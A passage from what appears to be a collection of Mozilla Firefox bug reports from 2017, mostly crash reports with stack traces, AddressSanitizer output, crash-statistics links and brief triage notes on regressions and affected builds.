#27 0x7f251924be57 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1287:17
#28 0x7f2519236bb6 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#29 0x7f251923a248 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#30 0x7f251b429bfc in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1047:7
#31 0x7f251c1ce9ab in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7635:5
#32 0x7f251c1ca7b4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7439:7
#33 0x7f251c1d1e1f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7336:13
#34 0x7f2516364700 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#35 0x7f2516363698 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#36 0x7f25163603f8 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#37 0x7f25163624f4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#38 0x7f25163630ac in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#39 0x7f25148b6eba in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
#40 0x7f2517359db6 in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8647:7
#41 0x7f251735968e in nsDocument::UnblockOnload(bool) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8575:9
#42 0x7f251732e5bb in nsDocument::DispatchContentLoadedEvents() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5061:3
#43 0x7f25173f38a2 in applyImpl<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
#44 0x7f25173f38a2 in apply<nsDocument, void (nsDocument::*)()> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
#45 0x7f25173f38a2 in mozilla::detail::RunnableMethodImpl<void (nsDocument::*)(), true, false>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
#46 0x7f25146d749b in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
#47 0x7f25147595dc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
#48 0x7f251551225f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#49 0x7f2515483db8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#50 0x7f2515483db8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#51 0x7f2515483db8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#52 0x7f251ab19c5f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#53 0x7f251cb97221 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
#54 0x7f251cd2e537 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
#55 0x7f251cd2fcad in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
#56 0x7f251cd30b6c in XRE_main /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4712:16
#57 0x4df91a in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:282:10
#58 0x4df91a in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:415
#59 0x7f253044b82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
#60 0x41ba88 in _start (firefox+0x41ba88)
|
|
1,402,581 | 12,695,469 |
This bug was filed from the Socorro interface and is
report bp-ea566dd0-40ab-4378-98ff-216300170922.
=============================================================
Crashing Thread (65), Name: DOMCacheThread
Frame Module Signature Source
0 xul.dll mozilla::dom::cache::LockedUpdateDirectoryPaddingFile(nsIFile*, mozIStorageConnection*, __int64, __int64, bool) dom/cache/FileUtils.cpp:813
1 xul.dll `anonymous namespace'::CacheQuotaClient::MaybeUpdatePaddingFileInternal<<lambda_05e898411bffc42f0b8fcdeec8794db5> > dom/cache/QuotaClient.cpp:326
2 xul.dll mozilla::dom::cache::MaybeUpdatePaddingFile<<lambda_9016d51e96a641430ae2586b84e342ac> >(nsIFile*, mozIStorageConnection*, __int64, __int64, <lambda_9016d51e96a641430ae2586b84e342ac>) dom/cache/QuotaClient.cpp:466
3 xul.dll mozilla::dom::cache::`anonymous namespace'::SetupAction::RunSyncWithDBOnTarget dom/cache/Manager.cpp:112
4 xul.dll mozilla::dom::cache::SyncDBAction::RunWithDBOnTarget(mozilla::dom::cache::Action::Resolver*, mozilla::dom::cache::QuotaInfo const&, nsIFile*, mozIStorageConnection*) dom/cache/DBAction.cpp:166
5 xul.dll mozilla::dom::cache::DBAction::RunOnTarget(mozilla::dom::cache::Action::Resolver*, mozilla::dom::cache::QuotaInfo const&, mozilla::dom::cache::Action::Data*) dom/cache/DBAction.cpp:121
6 xul.dll mozilla::dom::cache::Context::QuotaInitRunnable::Run() dom/cache/Context.cpp:459
7 xul.dll nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1039
8 xul.dll NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:521
9 xul.dll mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:368
10 xul.dll MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:319
11 xul.dll MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:299
12 xul.dll nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:427
13 nss3.dll _PR_NativeRunThread nsprpub/pr/src/threads/combined/pruthr.c:397
14 nss3.dll pr_root nsprpub/pr/src/md/windows/w95thred.c:95
15 ucrtbase.dll thread_start<unsigned int (__stdcall*)(void*)>
16 kernel32.dll BaseThreadInitThunk
17 mozglue.dll patched_BaseThreadInitThunk mozglue/build/WindowsDllBlocklist.cpp:824
18 ntdll.dll __RtlUserThreadStart
19 ntdll.dll _RtlUserThreadStart
these crashes started with a low frequency in 57.0a1, so far from 32bit builds on windows. they come with MOZ_RELEASE_ASSERT(currentPaddingSize >= aDecreaseSize) that got added in bug 1290481.
|
|
1,402,592 | 12,695,517 |
This bug was filed from the Socorro interface and is
report bp-294ba17c-b23d-462a-8dc2-23f7f0170923.
=============================================================
There are 29 crashes on nightly 57-58 starting with buildid 20170921100141. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1389021.
[1] https://hg.mozilla.org/mozilla-central/rev/4dd86bbce649
|
|
1,402,766 | 12,698,208 |
==21743==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000058 (pc 0x7f95458e3288 bp 0x7fff098710b0 sp 0x7fff09871000 T0)
==21743==The signal is caused by a READ memory access.
==21743==Hint: address points to the zero page.
#0 0x7f95458e3287 in Hdr /src/obj-firefox/dist/include/nsTArray.h:525:32
#1 0x7f95458e3287 in Elements /src/obj-firefox/dist/include/nsTArray.h:1038
#2 0x7f95458e3287 in IndexOf<const mozilla::FramePropertyDescriptorUntyped *, mozilla::FrameProperties::PropertyComparator> /src/obj-firefox/dist/include/nsTArray.h:1173
#3 0x7f95458e3287 in GetInternal /src/layout/base/FrameProperties.h:412
#4 0x7f95458e3287 in Get<nsContainerFrame> /src/layout/base/FrameProperties.h:234
#5 0x7f95458e3287 in GetProperty<nsContainerFrame> /src/layout/generic/nsIFrame.h:3508
#6 0x7f95458e3287 in nsInlineFrame::UpdateStyleOfOwnedAnonBoxesForIBSplit(mozilla::ServoRestyleState&) /src/layout/generic/nsInlineFrame.cpp:1073
#7 0x7f954580ce03 in nsIFrame::DoUpdateStyleOfOwnedAnonBoxes(mozilla::ServoRestyleState&) /src/layout/generic/nsFrame.cpp:10661:42
#8 0x7f9545564468 in UpdateStyleOfOwnedAnonBoxes /src/layout/generic/nsIFrame.h:3334:7
#9 0x7f9545564468 in mozilla::ServoRestyleManager::ProcessPostTraversal(mozilla::dom::Element*, mozilla::ServoStyleContext*, mozilla::ServoRestyleState&, mozilla::ServoPostTraversalFlags) /src/layout/base/ServoRestyleManager.cpp:877
...
see log.txt
|
|
1,403,353 | 12,704,428 |
This bug was filed from the Socorro interface and is
report bp-af5e7d3d-35b2-4905-99be-920d60170926.
=============================================================
[Tracking Requested - why for this release]:
there is an increase in crashes with signatures containing intel's igdusc64.dll module during the 57.a1 cycle and continuing into 57 beta. so far those reports account for a bit over 3% of browser crashes in early data from 57.0b.
https://crash-stats.mozilla.com/search/?signature=~igdusc64.dll&product=Firefox&version=57.0b&process_type=browser&date=%3E%3D2017-06-01T&date=%3C2017-09-26T21%3A29%3A11.000Z&_sort=-date&_facets=signature&_facets=version&_facets=user_comments&_facets=adapter_vendor_id&_facets=build_id&_facets=install_time&_facets=platform_pretty_version&_facets=useragent_locale&_facets=process_type&_facets=adapter_device_id&_facets=adapter_driver_version&_columns=date&_columns=signature&_columns=product&_columns=version&_columns=build_id&_columns=platform#crash-reports
Adapter device id facet
1 0x1616 89 61.38 %
2 0x0a16 27 18.62 %
3 0x041e 23 15.86 %
4 0x0416 3 2.07 %
|
|
1,403,841 | 12,709,370 |
[Tracking Requested - why for this release]:
this crash signature is spiking up in 57.0b and 58.0a1. it's cross-platform and seems to hit particular users repeatedly (on b3 we have >1000 crashes from 90 installations right now).
This bug was filed from the Socorro interface and is
report bp-2fd27fd8-0973-44f2-9aa2-561be0170927.
=============================================================
Crashing Thread (0)
Frame Module Signature Source
0 xul.dll nsINode::IsEditableInternal() dom/base/nsINode.cpp:216
1 xul.dll mozilla::EditorBase::IsSelectionEditable() editor/libeditor/EditorBase.cpp:566
2 xul.dll nsHighlightColorStateCommand::IsCommandEnabled(char const*, nsISupports*, bool*) editor/composer/nsComposerCommands.cpp:88
3 xul.dll nsControllerCommandTable::IsCommandEnabled(char const*, nsISupports*, bool*) dom/commandhandler/nsControllerCommandTable.cpp:98
4 xul.dll nsBaseCommandController::IsCommandEnabled(char const*, bool*) dom/commandhandler/nsBaseCommandController.cpp:105
5 xul.dll nsWindowRoot::GetEnabledDisabledCommandsForControllers(nsIControllers*, nsTHashtable<nsCharPtrHashKey>&, nsTArray<nsTString<char> >&, nsTArray<nsTString<char> >&) dom/base/nsWindowRoot.cpp:329
6 xul.dll nsWindowRoot::GetEnabledDisabledCommands(nsTArray<nsTString<char> >&, nsTArray<nsTString<char> >&) dom/base/nsWindowRoot.cpp:355
7 xul.dll ChildCommandDispatcher::Run() dom/base/nsGlobalWindow.cpp:10153
8 xul.dll nsContentUtils::AddScriptRunner(already_AddRefed<nsIRunnable>) dom/base/nsContentUtils.cpp:5712
9 xul.dll nsContentUtils::AddScriptRunner(nsIRunnable*) dom/base/nsContentUtils.cpp:5719
10 xul.dll nsGlobalWindow::UpdateCommands(nsTSubstring<char16_t> const&, nsISelection*, short) dom/base/nsGlobalWindow.cpp:10193
11 xul.dll nsDocViewerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) layout/base/nsDocumentViewer.cpp:3844
12 xul.dll mozilla::dom::Selection::NotifySelectionListeners() dom/base/Selection.cpp:3879
13 xul.dll nsFrameSelection::NotifySelectionListeners(mozilla::SelectionType) layout/generic/nsFrameSelection.cpp:2053
14 xul.dll mozilla::dom::Selection::RemoveRange(nsRange&, mozilla::ErrorResult&) dom/base/Selection.cpp:2519
15 xul.dll mozilla::dom::Selection::RemoveRange(nsIDOMRange*) dom/base/Selection.cpp:2447
16 xul.dll nsRange::SetSelection(mozilla::dom::Selection*) dom/base/nsRange.cpp:1061
17 xul.dll mozilla::dom::Selection::AddItemInternal(nsRange*, int*) dom/base/Selection.cpp:1219
18 xul.dll mozilla::dom::Selection::AddItem(nsRange*, int*, bool) dom/base/Selection.cpp:1203
19 xul.dll mozilla::dom::Selection::GetTableCellLocationFromRange(nsRange*, int*, int*, int*) dom/base/Selection.cpp:592
20 xul.dll mozilla::dom::Selection::AddRangeInternal(nsRange&, nsIDocument*, mozilla::ErrorResult&) dom/base/Selection.cpp:2394
21 xul.dll mozilla::dom::Selection::AddRange(nsRange&, mozilla::ErrorResult&) dom/base/Selection.cpp:2360
22 xul.dll mozilla::dom::SelectionBinding::addRange dom/bindings/SelectionBinding.cpp:294
23 xul.dll mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:3055
24 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:495
25 xul.dll InternalCall js/src/vm/Interpreter.cpp:540
26 xul.dll js::ForwardingProxyHandler::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) js/src/proxy/Wrapper.cpp:175
27 xul.dll js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) js/src/proxy/CrossCompartmentWrapper.cpp:359
28 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:477
29 xul.dll InternalCall js/src/vm/Interpreter.cpp:540
30 xul.dll Interpret js/src/vm/Interpreter.cpp:3084
31 xul.dll js::RunScript(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:435
32 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:513
33 xul.dll InternalCall js/src/vm/Interpreter.cpp:540
34 xul.dll js::fun_apply(JSContext*, unsigned int, JS::Value*) js/src/jsfun.cpp:1302
35 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:495
36 xul.dll InternalCall js/src/vm/Interpreter.cpp:540
37 xul.dll js::jit::DoCallFallback js/src/jit/BaselineIC.cpp:2589
38 @0xea67421
39 @0x17c570f7
40 @0xea6094e
41 xul.dll js::jit::EnterBaselineMethod(JSContext*, js::RunState&) js/src/jit/BaselineJIT.cpp:200
42 xul.dll js::RunScript(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:425
43 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:513
44 xul.dll js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) js/src/vm/Interpreter.cpp:559
45 xul.dll JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) js/src/jsapi.cpp:2965
46 xul.dll xpc::WrapperFactory::PrepareForWrapping(JSContext*, JS::Handle<JSObject*>, JS::Handle<JSObject*>, JS::Handle<JSObject*>, JS::MutableHandle<JSObject*>) js/xpconnect/wrappers/WrapperFactory.cpp:211
|
|
1,403,932 | 12,710,334 |
This bug was filed from the Socorro interface and is
report bp-5ea7a97b-1b84-4e11-9448-e8cc20170928.
=============================================================
Seen while looking at nightly crash stats: http://bit.ly/2ftbKZZ. Crashes started using 20170928100123
Possible regression range based on Build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=35fbf14b96a633c3f66ea13c1a163a3f3a4219b9&tochange=76a26ef7c493311c170ae83eb0c1d6592a21396d
Comments:
www.speedcurve.com
I went to pqi.org and clicked one of the calendar events, a colloquium by christopher white, on the left-hand side of the page. second time in a row that this caused a crash.
Possibly Bug 1305237? ni on Shane
|
|
1,403,951 | 12,710,463 |
[Tracking Requested - why for this release]: Completely broken, Browser window is missing.
Reproducible : always
Steps To Reproduce:
1. Enable Light Theme from addon manager
2. Restart
Actual Results:
No browser window display.
Expected Results:
Browser window should display properly
|
|
1,404,105 | 12,711,926 |
This bug was filed from the Socorro interface and is
report bp-151af9d2-018a-44aa-8a9d-041920170928.
=============================================================
We have a fair amount of crashes showing up in the very early 56.0 release results, with similar signatures to this one. It seems unclear if it's something that we think is significantly affecting users.
|
|
1,404,297 | 12,713,697 |
This bug was filed from the Socorro interface and is
report bp-55e48e11-4d66-492a-8087-0867a0170928.
=============================================================
Crashing Thread (0)
Frame Module Signature Source
0 xul.dll nsIDocument::FlushPendingLinkUpdates() dom/base/nsDocument.cpp:10330
1 xul.dll nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*, mozilla::dom::Element*) layout/base/nsCSSFrameConstructor.cpp:5194
2 xul.dll nsCSSFrameConstructor::AddFCItemsForAnonymousContent(nsFrameConstructorState&, nsContainerFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&, nsCSSFrameConstructor::FrameConstructionItemList&, unsigned int) layout/base/nsCSSFrameConstructor.cpp:11200
3 xul.dll nsCSSFrameConstructor::AddFCItemsForAnonymousContent(nsFrameConstructorState&, nsContainerFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&, nsCSSFrameConstructor::FrameConstructionItemList&, unsigned int) layout/base/nsCSSFrameConstructor.cpp:11199
4 xul.dll nsCSSFrameConstructor::BeginBuildingScrollFrame(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, nsIAtom*, bool, nsContainerFrame*&) layout/base/nsCSSFrameConstructor.cpp:4729
5 xul.dll nsCSSFrameConstructor::SetUpDocElementContainingBlock(nsIContent*) layout/base/nsCSSFrameConstructor.cpp:3025
this security sensitive crash has been around for a while- i've noticed it now because it is accounting for 0.46% of crashes in very early data for the rollout of 56.0 to release users.
|
|
1,404,518 | 12,715,522 |
This bug was filed from the Socorro interface and is
report bp-7100bacc-79b0-4bb7-80c7-186fb0170929.
=============================================================
Crashing Thread (0)
Frame Module Signature Source
0 xul.dll mozilla::gl::GLBlitHelper::BlitDescriptor(mozilla::layers::SurfaceDescriptorD3D10 const&, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gl::OriginPos) gfx/gl/GLBlitHelperD3D.cpp:284
1 xul.dll mozilla::gl::GLBlitHelper::BlitImage(mozilla::layers::GPUVideoImage*, mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gl::OriginPos) gfx/gl/GLBlitHelperD3D.cpp:193
2 xul.dll mozilla::webgl::TexUnpackImage::TexOrSubImage(bool, bool, char const*, mozilla::WebGLTexture*, StrongGLenum<TexImageTargetDetails>, int, mozilla::webgl::DriverUnpackInfo const*, int, int, int, mozilla::webgl::PackingInfo const&, unsigned int* const) dom/canvas/TexUnpackBlob.cpp:708
3 xul.dll mozilla::WebGLTexture::TexImage(char const*, StrongGLenum<TexImageTargetDetails>, int, unsigned int, mozilla::webgl::PackingInfo const&, mozilla::webgl::TexUnpackBlob const*) dom/canvas/WebGLTextureUpload.cpp:1306
4 xul.dll mozilla::WebGLTexture::TexImage(char const*, StrongGLenum<TexImageTargetDetails>, int, unsigned int, int, int, int, int, mozilla::webgl::PackingInfo const&, mozilla::TexImageSource const&) dom/canvas/WebGLTextureUpload.cpp:474
5 xul.dll mozilla::WebGLContext::TexImage(char const*, unsigned char, unsigned int, int, unsigned int, int, int, int, int, unsigned int, unsigned int, mozilla::TexImageSource const&) dom/canvas/WebGLContextTextures.cpp:394
6 xul.dll mozilla::WebGLContext::TexImage2D<mozilla::dom::HTMLImageElement>(unsigned int, int, unsigned int, int, int, int, unsigned int, unsigned int, mozilla::dom::HTMLImageElement const&, mozilla::ErrorResult&) dom/canvas/WebGLContext.h:1178
7 xul.dll mozilla::WebGLContext::TexImage2D<mozilla::dom::HTMLCanvasElement>(unsigned int, int, unsigned int, unsigned int, unsigned int, mozilla::dom::HTMLCanvasElement const&, mozilla::ErrorResult&) dom/canvas/WebGLContext.h:1155
8 xul.dll mozilla::dom::WebGLRenderingContextBinding::texImage2D dom/bindings/WebGLRenderingContextBinding.cpp:13221
9 xul.dll mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) dom/bindings/BindingUtils.cpp:3055
10 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:495
11 xul.dll Interpret js/src/vm/Interpreter.cpp:3084
12 xul.dll js::RunScript(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:435
13 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:513
14 xul.dll js::fun_call(JSContext*, unsigned int, JS::Value*) js/src/jsfun.cpp:1236
15 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:495
16 xul.dll Interpret js/src/vm/Interpreter.cpp:3084
17 xul.dll js::RunScript(JSContext*, js::RunState&) js/src/vm/Interpreter.cpp:435
18 xul.dll js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) js/src/vm/Interpreter.cpp:513
19 xul.dll js::jit::DoCallFallback js/src/jit/BaselineIC.cpp:2589
20 @0x15a991cd08d
crashes with this signature are starting to show up in 57.0b, in rather a low volume though - so far only from windows 8 & 10 users. it's in a codepath from bug 1322746, so ni to jeff to take a quick look here.
|
|
1,406,772 | 12,738,258 |
This bug was filed from the Socorro interface and is
report bp-ba2e1ec5-6662-4f05-8951-1377c0171003.
=============================================================
Crashing Thread (50)
Frame Module Signature Source
0 xul.dll mozilla::AudioChannelsDownMix<short>(nsTArray<short const*> const&, short**, unsigned int, unsigned int) dom/media/AudioChannelFormat.h:131
1 xul.dll mozilla::DownmixAndInterleave<short, float>(nsTArray<short const*> const&, int, float, unsigned int, float*) dom/media/AudioSegment.h:133
2 xul.dll mozilla::WriteChunk<short>(mozilla::AudioChunk&, unsigned int, float*) dom/media/AudioSegment.h:435
3 xul.dll mozilla::AudioSegment::WriteTo(unsigned __int64, mozilla::AudioMixer&, unsigned int, unsigned int) dom/media/AudioSegment.cpp:187
4 xul.dll mozilla::MediaStreamGraphImpl::PlayAudio(mozilla::MediaStream*) dom/media/MediaStreamGraph.cpp:950
5 xul.dll mozilla::MediaStreamGraphImpl::Process() dom/media/MediaStreamGraph.cpp:1396
6 xul.dll mozilla::MediaStreamGraphImpl::OneIteration(__int64) dom/media/MediaStreamGraph.cpp:1458
7 xul.dll mozilla::AudioCallbackDriver::DataCallback(float const*, float*, long) dom/media/GraphDriver.cpp:1031
8 xul.dll cubeb_resampler_speex<float, cubeb_resampler_speex_one_way<float>, delay_line<float> >::fill_internal_duplex(float*, long*, float*, long) media/libcubeb/src/cubeb_resampler.cpp:234
9 xul.dll `anonymous namespace'::refill media/libcubeb/src/cubeb_wasapi.cpp:564
10 xul.dll `anonymous namespace'::refill_callback_duplex media/libcubeb/src/cubeb_wasapi.cpp:763
11 xul.dll `anonymous namespace'::wasapi_stream_render_loop media/libcubeb/src/cubeb_wasapi.cpp:970
12 ucrtbase.dll o__strtoui64
13 kernel32.dll BaseThreadInitThunk
14 ntdll.dll RtlUserThreadStart
this crash signature in the content process is getting more common on 58.0a1, starting with build 20170930100302.
|
|
1,407,414 | 12,746,238 |
This bug was filed from the Socorro interface and is
report bp-135340f1-b601-4d4a-98f9-e68320171010.
=============================================================
This crash occurred after the session had been active for a number of hours. The url in the report is https://www.samsung.com/us/mobile/phones/galaxy-s/s/galaxy_s-galaxy_s8/_/n-10+11+hv1rp+zq1xa+troyz/ but I have had that url loaded into a tab for several days now so I don't know how useful it really is.
Similar crash in fixed bug 1234147
|
|
1,400,563 | 12,673,236 |
This bug was filed from the Socorro interface and is
report bp-f42d248e-262a-4f9a-ac7e-c546c0170916.
=============================================================
UAF (use after free) crash in sowakeup on association abort.
Crashes start in Firefox 54 (there are others with this signature from earlier, but they have very different stacks).
It looks like either sb_cond was 0xe5e5... or the data pointed to by sb_cond was freed (the condition var), which seems more likely.
|
|
1,400,637 | 12,673,828 |
This bug was filed from the Socorro interface and is
report bp-0de017b8-9108-46be-99d8-df65c0170917.
=============================================================
Most of these have this as the crash reason:
MOZ_RELEASE_ASSERT(!XRE_IsContentProcess()) (Content Process should have called InitChild() before first GetPlatform())
This is in the top 10 crashes for the 9-16 Nightly, but it is only from about 9 different installations.
|
|
1,401,227 | 12,681,726 |
This bug was filed from the Socorro interface and is
report bp-a7116c93-d902-4023-b592-dbf3c0170918.
=============================================================
There are 5 crashes in nightly 57 starting with buildid 20170918100058. In analyzing the backtrace, the regression may have been introduced by patch [1] to fix bug 1400602.
[1] https://hg.mozilla.org/mozilla-central/rev?node=c4f1d0d1852b6e61c7a3e78ec8c0e33879c20d95
|
|
1,401,709 | 12,687,223 |
Created attachment 8910460
testcase.html
The attached testcase causes a crash near null in m-c rev 20170920-469eb992a9d1
==20283==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x7f0a5f132550 bp 0x7ffe7f04b790 sp 0x7ffe7f04b520 T0)
==20283==The signal is caused by a READ memory access.
==20283==Hint: address points to the zero page.
#0 0x7f0a5f13254f in FloatManager /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.h:169:12
#1 0x7f0a5f13254f in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:608
#2 0x7f0a5f3459f1 in AddFloat /builds/worker/workspace/build/src/layout/generic/nsLineLayout.h:183:22
#3 0x7f0a5f3459f1 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:962
#4 0x7f0a5f343794 in nsInlineFrame::ReflowInlineFrame(nsPresContext*, mozilla::ReflowInput const&, nsInlineFrame::InlineReflowInput&, nsIFrame*, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.cpp:800:1
5
#5 0x7f0a5f341bed in nsInlineFrame::ReflowFrames(nsPresContext*, mozilla::ReflowInput const&, nsInlineFrame::InlineReflowInput&, mozilla::ReflowOutput&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.c
pp:682:7
#6 0x7f0a5f340dfe in nsInlineFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.cpp:461:3
#7 0x7f0a5f3a1bc1 in nsRubyTextFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsRubyTextFrame.cpp:81:23
#8 0x7f0a5f345619 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:921:13
#9 0x7f0a5f39a7fa in nsRubyBaseContainerFrame::ReflowSpans(nsRubyBaseContainerFrame::RubyReflowInput const&) /builds/worker/workspace/build/src/layout/generic/nsRubyBaseContainerFrame.cpp:831:17
#10 0x7f0a5f398227 in nsRubyBaseContainerFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsRubyBaseContainerFrame.cpp:416:25
#11 0x7f0a5f345619 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:921:13
#12 0x7f0a5f39f2e6 in nsRubyFrame::ReflowSegment(nsPresContext*, mozilla::ReflowInput const&, nsRubyBaseContainerFrame*, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsRubyFrame.cpp:221:29
#13 0x7f0a5f39e647 in nsRubyFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsRubyFrame.cpp:164:5
